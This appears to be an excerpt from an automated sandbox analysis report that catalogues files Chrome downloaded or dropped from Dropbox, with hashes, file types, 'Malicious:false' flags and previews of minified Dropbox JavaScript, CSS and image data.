                                                    Preview:define(["exports","./e_file_viewer_static_scl_page_folder","./e_core_exception","react","./c_core_i18n","./c_src_sink_index","./c_pap-events_docsend_view_docsend_hub_entry_button","./c_ts_utils","./c_lodash","metaserver/static/js/langpack","./e_edison","./c_api_v2_routes_folders_info_provider","./e_data_modules_stormcrow","./c_core_notify","react-dom","./c_performance_metrics_route_name_resolver","./c_integrations_hellosign_deep_integration_constants","metaserver/static/js/modules/constants/viewer"],(function(e,t,r,n,a,o,s,i,l,d,c,_,u,g,E,h,f,S){"use strict";function w(){return(new Date).getTime()}let p=null;const T="UG_DBX_DB",y="UG_STORE";function C(e){return new Promise(((t,r)=>{e.onsuccess=()=>t(e.result),e.onerror=()=>r(e.error)}))}async function D(e){return(await function(){if(!p){const e=indexedDB.open(T);e.onerror=e=>{console.error("There was an issue with initializing DB ",e)},e.onupgradeneeded=()=>e.result.createObjectStore(y),p=C(e)}return p}()).transaction(y,e).objectStore(
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:ASCII text, with very long lines (2046)
                                                    Category:dropped
                                                    Size (bytes):2112
                                                    Entropy (8bit):5.469174797586519
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:415BE9F5836FDF9D9D464D93C7179624
                                                    SHA1:91983409729E51105DDA6AD8986160D3AB1C607D
                                                    SHA-256:AB5295CCE68B7C4AB00B6A6325094F460E0F9944D0F4A142232BA81AA0CC041E
                                                    SHA-512:6453E8BDA9FE933AE14E2A5F91BB0373EF6F98DEB9A3511E557AC10A1E5F35877E26B6DEE51D94BA62EFCAC1FB146715491606CFB21444CF2ADA6B785DB707CB
                                                    Malicious:false
                                                    Reputation:unknown
                                                    Preview:define(["exports","react","./c_spectrum_svg_icon_bundle"],(function(e,t,n){"use strict";function r(e){if(e&&e.__esModule)return e;var t=Object.create(null);return e&&Object.keys(e).forEach((function(n){if("default"!==n){var r=Object.getOwnPropertyDescriptor(e,n);Object.defineProperty(t,n,r.get?r:{enumerable:!0,get:function(){return e[n]}})}})),t.default=e,Object.freeze(t)}var l=r(t);const o=JSON.parse('\n {"cancel":{"attrs":{"width":"24","height":"24","viewBox":"0 0 24 24"},"dangerouslySetInnerIconHtml":"<path d=\\"M12 10.586l-4.95-4.95L5.636 7.05l4.95 4.95-4.95 4.95 1.414 1.414 4.95-4.95 4.95 4.95 1.414-1.414-4.95-4.95 4.95-4.95-1.414-1.414z\\" fill=\\"currentColor\\" fill-rule=\\"evenodd\\"></path>"},"caret-down":{"attrs":{"width":"12","height":"12","viewBox":"0 0 12 12"},"dangerouslySetInnerIconHtml":"<g fill=\\"none\\" fill-rule=\\"evenodd\\"><path d=\\"M6 8L3 4h6z\\" fill=\\"currentColor\\"></path></g>"},"caret-up":{"attrs":{"width":"12","height":"12","viewBox":"0 0 12 12"},"da
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 250
                                                    Category:dropped
                                                    Size (bytes):199
                                                    Entropy (8bit):6.766983163126765
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:21B761F2B1FD37F587D7222023B09276
                                                    SHA1:F7A416C8907424F9A9644753E3A93D4D63AE640E
                                                    SHA-256:72D4161C18A46D85C5566273567F791976431EFEF49510A0E3DD76FEC92D9393
                                                    SHA-512:77745F60804D421B34DE26F8A216CEE27C440E469FD786A642757CCEDBC4875D5196431897D80137BD3E20B01104BA76DEC7D8E75771D8A9B5F14B66F2A9B7C0
                                                    Malicious:false
                                                    Reputation:unknown
                                                    Preview:..........u....0.._%2k.8?....w..k..!.M.."b5<.M.bD..c..l.:..}...@.8p.sn.j...%".B...J..6...c..^..?...2d...R..w.<%..}..}s..ir0/.......:8).(.......^u...0..U..I.F....{]...[-......~..F.P_.....G.....
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:ASCII text, with very long lines (400)
                                                    Category:downloaded
                                                    Size (bytes):74477
                                                    Entropy (8bit):4.996160179723149
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:C2FB1E82F7FDBE869652AC175C9D29B1
                                                    SHA1:D85A910ED2E0CF38EDE6DA3285B3440D4031F66A
                                                    SHA-256:5EE372C003E43363E596A80D8254C544A5D52A649B656F91A9E8F25B148BC306
                                                    SHA-512:A0D96C406761189E39F2C2EF3C07D6726AC8A82F075DABF0409B418F23A32CB51AFBECDC36A090532CADC1CB4E8A6BB6D0758EC146654FA832B247BFB210601F
                                                    Malicious:false
                                                    Reputation:unknown
                                                    URL:https://cfl.dropboxstatic.com/static/metaserver/static/css/spectrum/index.web-vflwvsegv.css
                                                    Preview:/*! @generated -- DO NOT MODIFY */../* -- avatar/index.web.css */..mc-avatar-initials-16 {. font-weight: 600;. font-size: 9px;. line-height: 16px;.}..mc-avatar-initials-24 {. font-weight: 500;. font-size: 11px;. line-height: 24px;.}..mc-avatar-initials-32 {. font-weight: 600;. font-size: 13px;.}..mc-avatar-initials-40 {. font-weight: 800;. font-size: 16px;.}..mc-avatar-initials-48 {. font-weight: 700;. font-size: 19px;.}..mc-avatar-initials-56 {. font-weight: 700;. font-size: 22px;.}..mc-avatar-text {. display: -ms-flexbox;. display: flex;. -ms-flex-pack: center;. justify-content: center;. -ms-flex-align: center;. align-items: center;. border-radius: 50%;. color: var(--dig-color__secondary__on-base, #fff);.}..mc-avatar-text-inactive {. opacity: 0.5;. filter: grayscale(1);.}..mc-avatar {. display: inline-block;. vertical-align: middle;. border-radius: 50%;. overflow: hidden;. outline: 0;.}..mc-avatar-
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:ASCII text, with very long lines (65536), with no line terminators
                                                    Category:dropped
                                                    Size (bytes):82680
                                                    Entropy (8bit):4.86219068201889
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:5BA09BB8116245BF45E73F2E5792E9C1
                                                    SHA1:A93E9F93582610C4A4E672C5C84C57620CE440AF
                                                    SHA-256:A871FBB714919402C47ADBE3A676F0FA638BB962837FE4B00A20A168210E8C43
                                                    SHA-512:FB7B8088B36EB59B5536618789E74A0BEA6E82AA1A081960F4662FBB1954F64460866C67BAFCB2F45C2C43C303CB3E23B3B089A94C2AB375053A32D634D09C08
                                                    Malicious:false
                                                    Reputation:unknown
                                                    Preview:define(["require","exports","react","./c_core_i18n","./e_file_viewer_static_scl_page_folder","./c_action_bar_action_bar_strings","./c_memoize-one","./c_admin_registration_source_constants","./c_pap-events_docsend_view_docsend_hub_entry_button","./c_sharing_sharing_pap_logging_create_shared_link_util","./c_sharing_low_distraction_view_gating_utils","./c_dig-icons_assets_ui-icon_line_passwords","./c_action_plugins_conversion_action_conditions","./c_action_plugins_audio_video_edit_action_definition","./c_dig-icons_assets_ui-icon_line_expand-left","./c_dig-icons_assets_ui-icon_line_signature","./c_file_actions_portable_select_destination","./c_action_plugins_move_action_definition","./c_dig-icons_assets_ui-icon_line_zip","./c_files_view_util","./c_dig-icons_assets_ui-icon_line_key","./c_dig-icons_assets_ui-icon_line_file-history"],(function(e,t,i,n,a,o,r,s,c,l,d,m,u,_,f,p,g,h,w,A,v,Z){"use strict";function E(e){if(e&&e.__esModule)return e;var t=Object.create(null);return e&&Object.keys(e).
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:ASCII text, with no line terminators
                                                    Category:downloaded
                                                    Size (bytes):96
                                                    Entropy (8bit):5.491547012067741
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:2C0B2C830A018ECF5B34FE0D269C168C
                                                    SHA1:82913FD0ACFB821F3CADC2754944CFF26D91895D
                                                    SHA-256:70FFEF238240C99BFDCF4295B1946FFF7E342526AADCE134F0FF2E680D1AE13E
                                                    SHA-512:9986B399B424F94ACA0717FCFEE21397AD2ED5ED76295CD1E699D2776CDCE42EF635D3F1D1CBE691CEA005872A7255998D82F074B09EDFD91396F3BCA5CED4FF
                                                    Malicious:false
                                                    Reputation:unknown
                                                    URL:https://fp.dropbox.com/CrbU/a8tlQRW/kdnryYu/iOjwI?q=hSrgVEjs3amxLolocQ18
                                                    Preview:iufhtG2s7pgcrP5Ze7KQ1zfQawINsseTMnhgYFIo1CE/LBA/fzBD2ae7gWw4xpzzm1Cq4h7yUuRc3Hbs9gubzs7jT0/xAPg=
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:ASCII text, with very long lines (21784)
                                                    Category:downloaded
                                                    Size (bytes):21837
                                                    Entropy (8bit):5.283966791038415
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:1EF248EA8470AB3E16B7AD2B86D2B180
                                                    SHA1:0E2AF5BEA27C1D46605F087386E0EC607C81D3A4
                                                    SHA-256:1538DB9809D5C4A8F4F8A2ED893C33FF76967EFD4A622CB35420F109573660C2
                                                    SHA-512:B3D7BCC237FD1447DFE28A795802F608F140E7E2617011F0AA52A8F97E1E81C74350EC7B4DC3204848EB8D6107F2361AC5209E7E59EC8DFD2F9FC87A98D4AF29
                                                    Malicious:false
                                                    Reputation:unknown
                                                    URL:https://cfl.dropboxstatic.com/static/atlas/file_viewer/scl_oboe_folder_bundle_amd/dist/c_core_notify-vflHvJI6o.js
                                                    Preview:define(["exports","react-dom","react","./e_edison"],(function(e,t,n,r){"use strict";function i(e){if(e&&e.__esModule)return e;var t=Object.create(null);return e&&Object.keys(e).forEach((function(n){if("default"!==n){var r=Object.getOwnPropertyDescriptor(e,n);Object.defineProperty(t,n,r.get?r:{enumerable:!0,get:function(){return e[n]}})}})),t.default=e,Object.freeze(t)}var o=i(t),a=i(n);function s(e,t,n,i=document,o="js:require_css",a="undefined"!=typeof jest){if(a)return Promise.resolve().then(t);const s=r.getOrCreateCache(i);return r.loadCssWithCache(i,s,new URL(r.static_url(e)),o).then(t,n)}const c=/[^\w@\.\ \-\(\)\,\$~%#\[\]\{\}\!\^]/g,l=e=>`&#${e.charCodeAt(0)};`,u=e=>`${e}`.replace(c,l);function d(e){return"object"==typeof e&&"function"==typeof e.toHTML}class f{constructor(e){this._str_DONT_TOUCH=e}toHTML(){return this._str_DONT_TOUCH}toString(){return"[object HTML]"}static tmpl(e,t){if(!/[^\w:.-]/.test(e)){const t=document.getElementById(e);e=t.innerHTML,window.CSP_SCRIPT_NONCE!=
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:ASCII text, with very long lines (469)
                                                    Category:downloaded
                                                    Size (bytes):470
                                                    Entropy (8bit):4.6289612247409035
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:3CDC1DC6479A0E2048BBB4BF35194524
                                                    SHA1:B5837404FB7ABCC60DB07CC14F96BDF31DE3FB89
                                                    SHA-256:06EA285779BCD40A8E1B53D86D5A89E7C64728A934FB356D17ECC15C7513A56D
                                                    SHA-512:0724455B336C78DB801E6355F05C55284E4EC5DBBC83D23F01FFF555A34B1059AAD2D270EEE28D4708026614D9DB5F8A9237CBF3EB7EBC29C58D7B26AB8FDD7E
                                                    Malicious:false
                                                    Reputation:unknown
                                                    URL:https://cfl.dropboxstatic.com/static/metaserver/static/css/account/emails-vflPNwdxk.css
                                                    Preview:.change-email-modal--maestro .db-modal .db-modal-title{text-align:center;margin-top:var(--spacing__unit--2);color:var(--dig-color__text__base)}.change-email-modal--maestro .db-modal .db-modal-content{background:var(--dig-color__background__base);margin:0 56px}.change-email-modal--maestro .db-modal .db-modal-content .db-modal-buttons{background:var(--dig-color__background__base);border-top:none;margin-bottom:var(--spacing__unit--3);padding:var(--spacing__unit--2) 0}.
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:ASCII text, with very long lines (2514)
                                                    Category:downloaded
                                                    Size (bytes):2585
                                                    Entropy (8bit):5.3492126841861545
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:912077501FCE64853F797EFB5E3B8C2A
                                                    SHA1:B7DFF9E523AF064B399459475280BB18EA14EC5A
                                                    SHA-256:D072421365E97ECEE332939C9473654382877D84BDE0F4ACF41996BDA6F8E716
                                                    SHA-512:C51B7A115B872E1C16B71EBA6DEA8205533F6E137BC7851B62FFCCBAFB1074567FD8A6409D87537F0106DE7ABB5BA80E767FF79A7C7A2E745CB8C8AC93EB38FA
                                                    Malicious:false
                                                    Reputation:unknown
                                                    URL:https://cfl.dropboxstatic.com/static/atlas/file_viewer/scl_oboe_folder_bundle_amd/dist/c_dig-components_skeleton_index-vflkSB3UB.js
                                                    Preview:define(["exports","react","./e_file_viewer_static_scl_page_folder"],(function(e,a,t){"use strict";function i(e){if(e&&e.__esModule)return e;var a=Object.create(null);return e&&Object.keys(e).forEach((function(t){if("default"!==t){var i=Object.getOwnPropertyDescriptor(e,t);Object.defineProperty(a,t,i.get?i:{enumerable:!0,get:function(){return e[t]}})}})),a.default=e,Object.freeze(a)}var s=i(a),l=t.createRuntimeFn({defaultClassName:"dig-xxwt2ad_20-8-0",variantClassNames:{shouldAnimate:{false:"dig-xxwt2ae_20-8-0",true:"dig-xxwt2af_20-8-0"},mode:{dark:"dig-xxwt2ag_20-8-0",bright:"dig-xxwt2ah_20-8-0"},withBorderRadius:{xsmall:"dig-xxwt2a6_20-8-0",small:"dig-xxwt2a7_20-8-0",medium:"dig-xxwt2a8_20-8-0",large:"dig-xxwt2a9_20-8-0",xlarge:"dig-xxwt2aa_20-8-0",circular:"dig-xxwt2ab_20-8-0",false:"dig-xxwt2ac_20-8-0"}},defaultVariants:{shouldAnimate:!0,mode:"bright"},compoundVariants:[]}),d=t.createRuntimeFn({defaultClassName:"dig-xxwt2at_20-8-0",variantClassNames:{size:{xsmall:"dig-xxwt2ap_20-8-0
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:Unicode text, UTF-8 text, with very long lines (23697)
                                                    Category:dropped
                                                    Size (bytes):23770
                                                    Entropy (8bit):5.302911017618011
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:5EA882B56694D633ADFFDCFD06F31B8A
                                                    SHA1:072956CB45933EF981F540830027DC123981F0D1
                                                    SHA-256:1CECFC06A8FA13D68270D72F5BDC34B571C8D8AAD363F42ECDD98BEC513EF016
                                                    SHA-512:05ACE83CF6AF43E1DC56DFDB6548ED8D00D844EBBEC57684E9C1F454E989BF33CC22AF2BC55B1FC7A9433E46800015EB1500626939A72C1C9DFFC6A0289A0320
                                                    Malicious:false
                                                    Reputation:unknown
                                                    Preview:define(["exports","react","./c_core_i18n","./c_spectrum_modal_utility_modal","./e_edison","./e_file_viewer_static_scl_page_folder","./c_unity_utils","./c_action_plugins_download_action_button","./c_ts_utils","./c_core_notify","./c_api_v2_routes_folders_info_provider","./c_spectrum_button","./c_ui_image","./c_cloud_docs_constants","./c_lodash","./c_extensions_open_button_types","./c_dig-icons_assets_ui-icon_line_upload","./c_dig-icons_assets_ui-icon_line_shuffle","./e_core_exception","./c_pap-events_docsend_view_docsend_hub_entry_button"],(function(e,t,n,i,o,a,s,r,l,c,d,p,u,_,f,m,h,g,y,x){"use strict";function E(e){return e&&e.__esModule?e:{default:e}}var A=E(t);const w=a.requireCssWithComponent((e=>A.default.createElement("div",{className:"app-actions-status-page"},A.default.createElement(u.Image,{className:"app-actions-status-image",src:o.static_url("/static/metaserver/static/images/dbx_cloud_doc_loading-vfl9ZK2NS.gif")}),A.default.createElement("div",{className:"app-actions-status-de
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:ASCII text
                                                    Category:downloaded
                                                    Size (bytes):328
                                                    Entropy (8bit):4.9392930747004
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:37917D2D104D8818C1C74568240D7551
                                                    SHA1:45D3590E90C611C07D4AB2802A3B19917C838D2B
                                                    SHA-256:574096BAE5A4171D589595E753CB9C8C7B9462D48431DDF8365955CF4AE5D807
                                                    SHA-512:16D0BD9CC09546074962470144A9F8F7E616080B437A5B65BBEB7B24D07B806C753C49FCD30E7F1B88B9040C36FD7D2FB7A91B21C544B11C8863F228824A64D2
                                                    Malicious:false
                                                    Reputation:unknown
                                                    URL:https://cfl.dropboxstatic.com/static/atlas/file_viewer/scl_oboe_folder_bundle_amd/dist/c_abuse_login_and_register_constants_fetch-vflN5F9LR.js
                                                    Preview:define(["exports","./c_react_query_helpers_queries_login_and_register_constants"],(function(e,t){"use strict";e.fetchLoginRegisterConstants=function(e){return t.loginAndRegisterConstantsPrefetchRequest.fetchQuery(e,{apiArg:null,pkgArg:null})}}));.//# sourceMappingURL=c_abuse_login_and_register_constants_fetch.js-vflBWqhQu.map.
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:ASCII text, with very long lines (7088)
                                                    Category:downloaded
                                                    Size (bytes):7169
                                                    Entropy (8bit):5.375513908724608
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:8E69E61953300AF4AA389A41C21B7733
                                                    SHA1:95B2588428E8035E7BA5BF6BB08C1348D2AD5491
                                                    SHA-256:5CB25D7C099FBA6A923892B15E55076B9DF7DB891DA90821C4044DACE63AB815
                                                    SHA-512:991BC9C4A77B90F3A9D29489DB7350A3F0356FB19E2E0621A10A07C57232D5C37F1989635524C98E81FB09D73F1A1C1916F49DF43BA73FF4B3543014DCD5F98E
                                                    Malicious:false
                                                    Reputation:unknown
                                                    URL:https://cfl.dropboxstatic.com/static/atlas/file_viewer/scl_oboe_folder_bundle_amd/dist/c_preview_audio_video_video_editing_utils-vfljmnmGV.js
                                                    Preview:define(["exports","./e_file_viewer_static_scl_page_folder","./c_core_logging_actions","./c_react_query_helpers_queries_file_content_metadata","./c_pap-events_previews_create_folder"],(function(t,e,n,r,o){"use strict";const i=async t=>new Promise((e=>requestAnimationFrame((()=>t&&t.current?e(t.current.getBoundingClientRect().left):e(void 0))))),a=(t,e,n)=>t>n?n:t<e?e:t,c=(t,e,n,r)=>a(e,n,r)-t,s=(t,e,n,r)=>{const o=r-n;return Math.floor(n+t/e*o)},l=(t,e,n,r)=>r*(n-t)/(e-t),u=(t,e,n=1e-6)=>Math.abs(t-e)<n,d=(t,e)=>!(null==e||u(t.start,0)&&u(t.end,e)),g=t=>t>e.AUDIO_VIDEO_EDITING_SIZE_LIMIT,_=t=>t&&t>60*e.AUDIO_VIDEO_EDITING_DURATION_MINS_LIMIT,h=t=>t&&t<=1,T=t=>{if(t&&t.resolution_height&&t.resolution_width){const e=t.resolution_width,n=t.resolution_height;if(Math.max(e,n)>3840||Math.min(e,n)>2160)return!0}return!1},E=["h264"],p=[...E,"aac","flac","mp3","opus","pcm","hevc","mjpeg","av1"],I=t=>t&&p.includes(t);t.calculateLeftHandlePosition=async(t,e,n,r)=>{const a=await i(e);if(null==a)ret
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:ASCII text
                                                    Category:downloaded
                                                    Size (bytes):661
                                                    Entropy (8bit):5.129341069954787
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:9067859A55F8C3BA9411E359AEDAEE5A
                                                    SHA1:D0B845A155676462C2D3FF60616E5057B3C6CE0C
                                                    SHA-256:998169C92E5A694A77E31ED1866BA8EFF894C2A604ED244C03973876AC1796B6
                                                    SHA-512:82D11179E0CB856EEE2086332F6859943AE37B2A9076BD331DA7D1CCFA12E525820D8D23B878D09EE41D09D60358C6392CD1BC05E26015707AE896C1D261B637
                                                    Malicious:false
                                                    Reputation:unknown
                                                    URL:https://cfl.dropboxstatic.com/static/metaserver/static/css/dig-components/index.web-vflkGeFml.css
                                                    Preview:@import url('./components-vflWHv-Cs.css');./* This loads **after** `components.css` because it contains all the legacy color tokens */.@import url('./legacy-token-migration-vfl1sMmEL.css');.@import url('./logos-vflprtpOP.css');.@import url('./icons-vfl_2f8Dj.css');.@import url('./foundations-tokens-vflkwo9I6.css');.@import url('./foundations-components-vflVZfKma.css');.@import url('./content-icons-vfliRJDVx.css');./* For any images that are circle cropped, scale them up a bit so that they're still cropped as a squircle */..dig-Avatar-image--modern[src*='circle_crop=1'],..dig-Avatar-image--modern[srcset*='circle_crop=1'] {. transform: scale(1.075);.}.
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:ASCII text, with very long lines (4718)
                                                    Category:downloaded
                                                    Size (bytes):4785
                                                    Entropy (8bit):5.357574858706271
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:FDC8523DD94E1F7BF3F6E8C526CDB3BC
                                                    SHA1:4E7AF439F47B6D778053FB60B488AD1DE7EF47C4
                                                    SHA-256:4FDBB892278D374DE56EA55E9E306C1057F6259473DDA1324E4A2BD77006F98C
                                                    SHA-512:01C840378E128DCB58643F0F4F32E77D3DE875E41BC5BC126974D1C303FA24C6D08C66294C8FE9C26561664343FC9C5964290056593883418CE539C921720F22
                                                    Malicious:false
                                                    Reputation:unknown
                                                    URL:https://cfl.dropboxstatic.com/static/atlas/file_viewer/scl_oboe_folder_bundle_amd/dist/c_dig-components_chip_index-vfl_chSPd.js
                                                    Preview:define(["exports","./e_file_viewer_static_scl_page_folder","react"],(function(e,i,t){"use strict";function a(e){if(e&&e.__esModule)return e;var i=Object.create(null);return e&&Object.keys(e).forEach((function(t){if("default"!==t){var a=Object.getOwnPropertyDescriptor(e,t);Object.defineProperty(i,t,a.get?a:{enumerable:!0,get:function(){return e[t]}})}})),i.default=e,Object.freeze(i)}var s=a(t),l=s.createContext(void 0),n=i.createRuntimeFn({defaultClassName:"dig-13n6pq97_20-8-0",variantClassNames:{isSelected:{true:"dig-13n6pq98_20-8-0",false:"dig-13n6pq99_20-8-0"},selectedStyle:{fill:"dig-13n6pq9a_20-8-0",stroke:"dig-13n6pq9b_20-8-0"},isSelectable:{true:"dig-13n6pq9c_20-8-0",false:"dig-13n6pq9d_20-8-0"},variant:{standard:"dig-13n6pq9e_20-8-0",attention:"dig-13n6pq9f_20-8-0",success:"dig-13n6pq9g_20-8-0",warning:"dig-13n6pq9h_20-8-0",transparent:"dig-13n6pq9i_20-8-0",alert:"dig-13n6pq9j_20-8-0"},size:{xsmall:"dig-13n6pq9k_20-8-0",small:"dig-13n6pq9l_20-8-0",medium:"dig-13n6pq9m_20-8-0"}},
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:ASCII text, with very long lines (2558)
                                                    Category:dropped
                                                    Size (bytes):2636
                                                    Entropy (8bit):5.371571577234746
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:340375E378D53F5861043483BE6DAE19
                                                    SHA1:3B699F3976A52698D5C9945E1722660C90D45828
                                                    SHA-256:5A9E5C68B8514B32ED2DCEAF1B20A45D33D98A7B091B58D161B4A1139EC35175
                                                    SHA-512:CAC26EAE00E9C31BD13DAE22CB4B18BE4B7EF046447579BD28D06DA39FEE68D9E0A39A17323E252DE4A4F0323B5569F3A936E353473D26203B1A746A09CDC3DE
                                                    Malicious:false
                                                    Reputation:unknown
                                                    Preview:define(["exports","react"],(function(e,l){"use strict";function t(e){if(e&&e.__esModule)return e;var l=Object.create(null);return e&&Object.keys(e).forEach((function(t){if("default"!==t){var n=Object.getOwnPropertyDescriptor(e,t);Object.defineProperty(l,t,n.get?n:{enumerable:!0,get:function(){return e[t]}})}})),l.default=e,Object.freeze(l)}var n=t(l);e.FolderLine=e=>n.createElement("svg",{viewBox:"0 0 24 24",fill:"none",...e},n.createElement("path",{d:"M17.75 19h-12a2.25 2.25 0 0 1-2.25-2.25V5h4.573a2.238 2.238 0 0 1 2.012 1.244l.378.756H20v9.75A2.25 2.25 0 0 1 17.75 19ZM5 6.5v10.25a.75.75 0 0 0 .75.75h12a.75.75 0 0 0 .75-.75V8.5H9.537l-.793-1.585a.745.745 0 0 0-.671-.415H5Z",fill:"currentColor",vectorEffect:"non-scaling-stroke"})),e.IndentLine=e=>n.createElement("svg",{viewBox:"0 0 24 24",fill:"none",...e},n.createElement("path",{fillRule:"evenodd",clipRule:"evenodd",d:"M11 5.5h8V7h-8V5.5Zm8 5.5h-8v1.5h8V11Zm0 5.5H5V18h14v-1.5ZM5 11.508l1.121.996L9.234 9 6.121 5.5l-1.12.997L7.226 9 5
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:PNG image data, 480 x 621, 8-bit/color RGB, non-interlaced
                                                    Category:dropped
                                                    Size (bytes):49560
                                                    Entropy (8bit):7.964163333620195
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:6717FD4B64803175ED2A811E41106DE7
                                                    SHA1:1E941C937F36431A9DE758AFF13DC89511E2A463
                                                    SHA-256:389BEA5734D62B37EF82AAB3DE9A99A95DB25A444E5E20C65DF9C1968B5B6226
                                                    SHA-512:6BB0238F5FAB751EF46CA497BB96740CB0AA18E10D68193D956824AA5D4C4A672B07F6BFAC823BB09D7C21E12467568BDC4A87DD03FA96D2004AF1002DFC1F1B
                                                    Malicious:false
                                                    Reputation:unknown
                                                    Preview:.PNG........IHDR.......m.....ap4Y...5iCCPICC Profile..x.c``2a..... w'...(..{.l.,................v....E.!...Z.....qeRvA.... [..........@..@.h..@...x:.}..N.....E!A.@.. .!.......... .{.:..Z......*$.$&g+.''...+..........300-A.!.$....r)./H..Q..K.C......+.........[..$n!.T.a......|riQ...R@|...s..d.l.o.....&..5'.IXOrc.,.}.]P..iV...u...4.....I\...$.....IDATx...u..G.7.oUw..++............\..._r....J...A.Kp_.Xc}.u....f'...K.......tWW..~.....QJ.a...=.bW.a..9?....0>..4.0..b..0..X@3...(....0>..4.0..b..0..X@3...(....0>..4.0..b..0..X@3...(....0>..4.0..b..0..X@3...(....0>..4.0..b..0..X@3...(....0>..4.0..b..0..X@3...(....0>..4.0..b..0..X@3...(....0>..4.0..b..0..X@3...(....0>..4.0..b..0..X@3...(....0>..4.0..b..0..X@3...(....0>..4.0.../v.~J..]..a|.B.bW..C,...a|...v:.}}}...%.0?!J..`0...."?....R...~.(..db......EQZ[[....t..]...r.h..q..~. ...".....+W.\.....B.n....].0.s._.../v]~..'...c.1.8.0.\..bq.0..X@3...(....0>..4.0..b..0..X@3...(....0>..4.0..b..0..X@3...(....0>..4.0..b
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:ASCII text, with very long lines (1951)
                                                    Category:downloaded
                                                    Size (bytes):2036
                                                    Entropy (8bit):5.143353880093021
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:168DF5D04D0B2CD13FA435158182CC4B
                                                    SHA1:8F1028CE5A197382C6D1A37AD50EF425E4E13480
                                                    SHA-256:E837461EEE0D36CFED6A84C1C5AD9A95DDAA2682688F00486397B09BA5B84077
                                                    SHA-512:1F1F9AB9AD89387BF077E58B24E3E91092A977E0B63FC74CD593550BDD56F68C510F0D9AE6B16AB89BB69CCC1E6B0EC8DEA89B1A9305EDA446009E39BADE923D
                                                    Malicious:false
                                                    Reputation:unknown
                                                    URL:https://cfl.dropboxstatic.com/static/atlas/file_viewer/scl_oboe_folder_bundle_amd/dist/c_action_plugins_conversion_action_conditions-vflFo310E.js
                                                    Preview:define(["exports","./e_file_viewer_static_scl_page_folder","react","./c_pap-events_docsend_view_docsend_hub_entry_button"],(function(e,i,r,o){"use strict";const s=e=>!("isDeleted"in e)||!("is_unmounted"in e)||!e.isDeleted&&!e.is_unmounted,t=e=>"is_in_vault_folder"in e&&e.is_in_vault_folder,l=e=>{var i;return"per_node_metadata"in e&&!!(null===(i=e.per_node_metadata)||void 0===i?void 0:i.link_node)};const n=(e,i)=>{const{previewType:r,previewSurface:o,file:s,user:t,sharePermission:l,isNestedArchiveFile:n,canRestoreRevision:d,sharedLinkInfo:u}=e,{shouldShowForPreviewType:a,shouldShowForPreviewSurface:_,filterValidUser:c,filterValidFile:v}=i,f=c(t),p=v(s,l,n,d,u);if(a(r)&&_(o)&&f&&p)return{user:f,file:p}},d=()=>!0,u=e=>e?{user:e}:void 0,a=e=>i=>e.includes(i),_=e=>i.isBrowseFile(e)&&!l(e)&&s(e),c=e=>e!==i.SDKPreviewSurface.VERSION_HISTORY,v={shouldShowForPreviewSurface:c,shouldShowForPreviewType:d,filterValidUser:u,filterValidFile:e=>_(e)?e:void 0},f={shouldShowForPreviewSurface:c,shouldSho
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 2905
                                                    Category:dropped
                                                    Size (bytes):1173
                                                    Entropy (8bit):7.811199816788843
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:5C7ACF60A2ACAA5C54BF2B2EC6D484D8
                                                    SHA1:F1837FD5DB6DAD498148D7D77438DE693114B042
                                                    SHA-256:EE21196A4F5EF64135B7998E58F1E7210608674E3FDF97B328C1C237E3B184DB
                                                    SHA-512:11516935B1C777D6457B7FB44235F8C8A73BA1313AC8607C16D342EECAE22AE5BFD702CE01DBB2DC63C3D480E89A689C7AA6CAC8D822E306B413534FEE770A77
                                                    Malicious:false
                                                    Reputation:unknown
